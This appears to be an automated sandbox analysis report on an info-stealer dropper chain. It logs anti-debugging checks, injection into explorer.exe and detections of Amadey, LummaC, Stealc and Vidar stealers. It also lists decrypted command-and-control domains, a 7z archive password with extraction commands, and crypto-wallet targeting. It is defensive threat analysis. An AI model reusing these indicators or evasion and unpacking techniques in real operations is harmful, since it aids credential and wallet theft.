Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04C90C79 rdtsc

0_2_04C90C79

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_009B66A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,

20_2_009B66A8

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5652B mov eax, dword ptr fs:[00000030h]	0_2_00B5652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5A302 mov eax, dword ptr fs:[00000030h]	0_2_00B5A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F6A302 mov eax, dword ptr fs:[00000030h]	3_2_00F6A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F6652B mov eax, dword ptr fs:[00000030h]	3_2_00F6652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F6A302 mov eax, dword ptr fs:[00000030h]	4_2_00F6A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F6652B mov eax, dword ptr fs:[00000030h]	4_2_00F6652B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe

Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6432 base: 4F2010 value: 00

LummaC encrypted strings found

Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sweepyribs.lat

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Thread register set: target process: 6432

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe "C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe "C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe "C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe "C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe "C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Process created: unknown unknown

Source: d5cd5e4aa8.exe, 0000002E.00000002.4002520006.000000000099C000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: XProgram Manager
Source: skotes.exe, skotes.exe, 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_009BD690 cpuid

20_2_009BD690

Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018752001\ceb22082b1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018752001\ceb22082b1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018753001\0d47226567.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018754001\e6495426be.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018754001\e6495426be.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018755001\5b8d16eb23.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018755001\5b8d16eb23.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018756001\6ab9fd9cb3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018756001\6ab9fd9cb3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018757001\bae1ddf86f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018757001\bae1ddf86f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018758001\7962b1cc51.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018758001\7962b1cc51.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018759041\TSR9hLL.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018760001\6e10e1308f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018760001\6e10e1308f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018761001\11dc0b2109.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018761001\11dc0b2109.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018762001\7dd90a1f78.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018762001\7dd90a1f78.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B3CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_00B3CBEA

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_009BDBA0 GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,

20_2_009BDBA0

Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: ea17d0b77a.exe, 0000002F.00000003.3471828382.0000000001104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: es%\Windows Defender\MsMpeng.exe
Source: ea17d0b77a.exe, 0000002F.00000003.3421003760.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421454526.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3422664576.0000000005996000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 4.2.skotes.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2262477071.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2755017599.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2272594198.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2221672468.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: ea17d0b77a.exe PID: 3920, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000030.00000003.3334314821.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.4222202528.0000000000F21000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
